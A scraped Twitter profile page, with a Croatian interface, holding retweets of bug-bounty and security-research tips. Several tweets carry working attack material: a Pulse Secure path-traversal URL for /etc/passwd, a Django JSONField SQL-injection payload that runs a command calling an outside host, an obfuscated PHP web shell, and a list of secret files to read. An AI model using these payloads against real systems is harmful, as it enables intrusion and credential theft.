Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @enwuft
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @enwuft
-
Prikvačeni tweet
"You have to believe you can accomplish something because once you believe that, you're half way to actually doing something".
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
New blog post: A Less Known Attack Vector, Second Order IDOR Attackshttps://link.medium.com/okQ4s0yss3
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
If a mentally unstable highschool dropout without degrees can get a job at Microsoft, anyone can achieve their dreams. Just got to keep going at it, even if you go half crazy.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
Found HTML Injection in a web form but the CSP was blocking execution. I noticed *.google.com was allowed which is common for Google Analytics. Hosted an xss.js payload on Google Drive and found the raw download link. Passed that in to the script src location and
! CSP Bypass.pic.twitter.com/kT7rB91O8Z
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
คุณมีความสามารถ คุณทำอะไรก็ได้ อย่างเช่นไปดูหมีขั่วโลกhttps://twitter.com/SandboxBear/status/1208470505193431042 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
Wow, this is unbelievable! I share this great honour with everyone in the
#FridaysForFuture movement and climate activists everywhere.#climatestrike https://time.com/person-of-the-year-2019-greta-thunberg/ …pic.twitter.com/u4JUD4cgCz
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
How I hacked 50+ Companies in 6 hrs https://medium.com/vault-infosec/how-i-hacked-50-companies-in-6-hrs-7ec0368a9196 … [Writeup — FB] Crash web — app through application form of job application pages https://medium.com/@tiendat253/writeup-fb-crash-web-app-through-application-form-of-job-application-pages-405fa3def937 …
#bugbounty,#bugbountytips [1/2]
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
Maximise the
#BugBounty Payout Check Directories - /proc/mounts /proc/net/arp /etc/motd /etc/mysql/my.cnf /proc/net/route /proc/sched_debug /proc/self/environ /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /var/run/secrets/kubernetes.io/serviceaccount /proc/self/cwd/index.phpHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
File disclosure in Pulse Secure SSL VPN, 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4. Cc
@0xDezzy inurl:/dana-na/ filetype:cgi /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/pic.twitter.com/eWsnEHBoHX
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella
#osint#recon#bugbounty#bugbountytiphttps://github.com/OWASP/AmassHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
Pre-auth RCE on Fortinet and Pulse Secure (prior: Juniper) SSL VPN's by
@orange_8361 and@mehqq_ - over 500k such VPN's on the internet. Heap overflow, arbitrary file read, plaintext passwords, magic backdoor, command injection... Defcon slides: https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs.pdf …pic.twitter.com/0rXRw8QSLu
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
Exploit vulnerabilities in Android media parsers? Stagefright decoders? That's old, everyone did that. Instead, let's attack the hardware decoders! Great work by
@GXiling https://i.blackhat.com/USA-19/Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remotely-Exploit-The-Hardware-Decoder-On-Smartphone.pdf …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
New Vulnerabilities in 5G Networks 「PDF」 https://i.blackhat.com/USA-19/Wednesday/us-19-Shaik-New-Vulnerabilities-In-5G-Networks.pdf …
#SRSLTE#SDR#USRPpic.twitter.com/AXb3MTaJij
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
Back home after BH, so much cool stuff on iOS dropped in the last week. A week off is just what i need. For those interested, this is my reading list https://www.dropbox.com/s/1a0foqjctrqzy7s/blackhat-2019-crlmhg-v4.pdf?dl=0 … https://i.blackhat.com/USA-19/Thursday/us-19-Wang-Attacking-IPhone-XS-Max.pdf … https://i.blackhat.com/USA-19/Thursday/us-19-Huang-Towards-Discovering-Remote-Code-Execution-Vulnerabilities-In-Apple-FaceTime.pdf … https://googleprojectzero.blogspot.com/2019/08/the-fully-remote-attack-surface-of.html …https://github.com/Siguza/APRR
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
EXP for CVE-2019-14234 Django JSONField SQL Injection Step1: ?data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) -- OR .... Step2: ?data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping http://xxx.ceye.io ' -- OR ...pic.twitter.com/YMWa7GNUl2
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
<?php (error_reporting(0)).($_[0][]=@$_GET["\x30"]). ($_[1][]="\x73").($_[1][]="\x79").($_[1][]="\x73\x74"). ($_[1][]="\x65\x6D").($l=@get_defined_vars()['_'][1]).($´.=$l[0]).($´.=$l[1]).($´.=$l[2]).($´.=$l[3]).(($´("{$_[0][0]}")).exit); Exec: curl-v'http://sv/x.php?0=id;uname'
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
#bugbountytip: install keyFinder at your browser(https://github.com/momenbasel/keyFinder …) --> surf the web --> go to results --> check API key at https://github.com/streaak/keyhacks#Google-Maps-API-key …#BugBounty#bugbountytips#BugbountyProTippic.twitter.com/s0uGltinAD
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Lui proslijedio/la je Tweet
All 5 parts of my
#docker series have now moved from Medium to my own blog. Part I https://softchris.github.io/pages/docker-one.html …, Part II https://softchris.github.io/pages/docker-two.html …, Part III https://softchris.github.io/pages/docker-three.html …, Part IV https://softchris.github.io/pages/docker-four.html …, Part V https://softchris.github.io/pages/docker-five.html …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.